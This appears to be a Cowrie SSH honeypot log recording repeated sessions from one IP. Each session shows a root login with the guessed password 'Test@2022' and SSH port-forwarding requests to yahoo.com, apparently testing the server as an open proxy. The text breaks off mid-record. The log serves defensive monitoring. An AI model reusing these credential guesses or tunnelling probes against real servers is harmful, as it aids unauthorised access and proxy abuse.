{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:58.516789Z","src_ip":"213.209.150.239","session":"e57bdfc20506"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6714,"dst_ip":"1.2.3.4","dst_port":22,"session":"288d51ccb679","protocol":"ssh","message":"New connection: 213.209.150.239:6714 (1.2.3.4:22) [session: 288d51ccb679]","sensor":"my-vps","timestamp":"2025-08-26T00:59:58.562878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:58.563577Z","src_ip":"213.209.150.239","session":"288d51ccb679"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:58.610897Z","src_ip":"213.209.150.239","session":"288d51ccb679"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:58.845851Z","src_ip":"213.209.150.239","session":"288d51ccb679"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":196,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:196","sensor":"my-vps","timestamp":"2025-08-26T00:59:58.894656Z","session":"288d51ccb679"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:58.942121Z","src_ip":"213.209.150.239","session":"288d51ccb679"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":16392,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16392","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.077554Z","session":"288d51ccb679"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.124935Z","src_ip":"213.209.150.239","session":"288d51ccb679"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.173242Z","src_ip":"213.209.150.239","session":"288d51ccb679"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6758,"dst_ip":"1.2.3.4","dst_port":22,"session":"a45bb3dc30e2","protocol":"ssh","message":"New connection: 213.209.150.239:6758 (1.2.3.4:22) [session: a45bb3dc30e2]","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.228626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.229348Z","src_ip":"213.209.150.239","session":"a45bb3dc30e2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.286003Z","src_ip":"213.209.150.239","session":"a45bb3dc30e2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.568049Z","src_ip":"213.209.150.239","session":"a45bb3dc30e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":24434,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24434","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.625745Z","session":"a45bb3dc30e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.682237Z","src_ip":"213.209.150.239","session":"a45bb3dc30e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":17625,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:17625","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.838828Z","session":"a45bb3dc30e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.895344Z","src_ip":"213.209.150.239","session":"a45bb3dc30e2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.952977Z","src_ip":"213.209.150.239","session":"a45bb3dc30e2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6811,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e127bb38a75","protocol":"ssh","message":"New connection: 213.209.150.239:6811 (1.2.3.4:22) [session: 8e127bb38a75]","sensor":"my-vps","timestamp":"2025-08-26T00:59:59.999580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:00.000360Z","src_ip":"213.209.150.239","session":"8e127bb38a75"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:00.047976Z","src_ip":"213.209.150.239","session":"8e127bb38a75"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:00.283101Z","src_ip":"213.209.150.239","session":"8e127bb38a75"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":19967,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:19967","sensor":"my-vps","timestamp":"2025-08-26T01:00:00.331942Z","session":"8e127bb38a75"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:00.379400Z","src_ip":"213.209.150.239","session":"8e127bb38a75"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":31113,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:31113","sensor":"my-vps","timestamp":"2025-08-26T01:00:00.518229Z","session":"8e127bb38a75"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:00.565519Z","src_ip":"213.209.150.239","session":"8e127bb38a75"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:00.613489Z","src_ip":"213.209.150.239","session":"8e127bb38a75"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6856,"dst_ip":"1.2.3.4","dst_port":22,"session":"1074d3f789aa","protocol":"ssh","message":"New connection: 213.209.150.239:6856 (1.2.3.4:22) [session: 1074d3f789aa]","sensor":"my-vps","timestamp":"2025-08-26T01:00:00.669111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:00.679393Z","src_ip":"213.209.150.239","session":"1074d3f789aa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:00.726226Z","src_ip":"213.209.150.239","session":"1074d3f789aa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:01.009062Z","src_ip":"213.209.150.239","session":"1074d3f789aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":9400,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9400","sensor":"my-vps","timestamp":"2025-08-26T01:00:01.067031Z","session":"1074d3f789aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:01.123717Z","src_ip":"213.209.150.239","session":"1074d3f789aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":27628,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:27628","sensor":"my-vps","timestamp":"2025-08-26T01:00:01.280184Z","session":"1074d3f789aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:01.339136Z","src_ip":"213.209.150.239","session":"1074d3f789aa"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:01.397767Z","src_ip":"213.209.150.239","session":"1074d3f789aa"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6907,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8990c71c57b","protocol":"ssh","message":"New connection: 213.209.150.239:6907 (1.2.3.4:22) [session: d8990c71c57b]","sensor":"my-vps","timestamp":"2025-08-26T01:00:01.445623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:01.448582Z","src_ip":"213.209.150.239","session":"d8990c71c57b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:01.497435Z","src_ip":"213.209.150.239","session":"d8990c71c57b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:01.822419Z","src_ip":"213.209.150.239","session":"d8990c71c57b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":27702,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:27702","sensor":"my-vps","timestamp":"2025-08-26T01:00:01.891325Z","session":"d8990c71c57b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:01.943329Z","src_ip":"213.209.150.239","session":"d8990c71c57b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":22148,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:22148","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.086235Z","session":"d8990c71c57b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.158746Z","src_ip":"213.209.150.239","session":"d8990c71c57b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.216505Z","src_ip":"213.209.150.239","session":"d8990c71c57b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":6959,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3d017abb231","protocol":"ssh","message":"New connection: 213.209.150.239:6959 (1.2.3.4:22) [session: b3d017abb231]","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.265159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:02.285737Z","src_ip":"213.209.150.239","session":"b3d017abb231"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh